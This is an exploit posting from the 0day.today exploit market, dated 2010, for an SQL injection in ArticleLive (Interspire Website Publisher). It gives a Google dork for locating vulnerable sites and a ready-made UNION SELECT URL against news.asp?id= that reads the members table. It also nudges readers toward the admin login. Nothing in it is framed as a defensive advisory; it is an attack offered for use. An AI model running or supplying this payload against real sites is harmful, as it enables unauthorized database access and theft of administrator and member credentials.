[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ArticleLive (Interspire Website Publisher) SQL Injection Vulnerability

Author
ra3ch
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12156
Category
web applications
Date add
07-05-2010
Platform
asp
======================================================================
ArticleLive (Interspire Website Publisher) SQL Injection Vulnerability
======================================================================

*******************************************************************************
# Author   : ra3ch
# Product  : ArticleLive (Interspire Website Publisher)
# Price    : N/A
# Site     : www.dz4all.com/cc
# Dork     : "Website by Spokane Web Communications"
# Risk     : High
*
**Vulnerable script: news.asp?id= (SQL-injection)
*
---------------------------------------------------------
*
*
**http://server/[path]/news.asp?id=  [SQL Inject]
*
*
**news.asp?id=34 union select 1,2,3,4,5,6,7,8,9,10,11 from members
*
*
**Exploit:
*
**http://server/news.asp?id=118%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20members
 
**Admin Login->
*
*
**http://server/[path]/Use your intelligence
*
*""""""""""""""""""""
** Greetz to :     ALLAH
**         All Members of  http://www.DZ4All.cOm/Cc
**          And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & ..... 



#  0day.today [2024-12-25]  #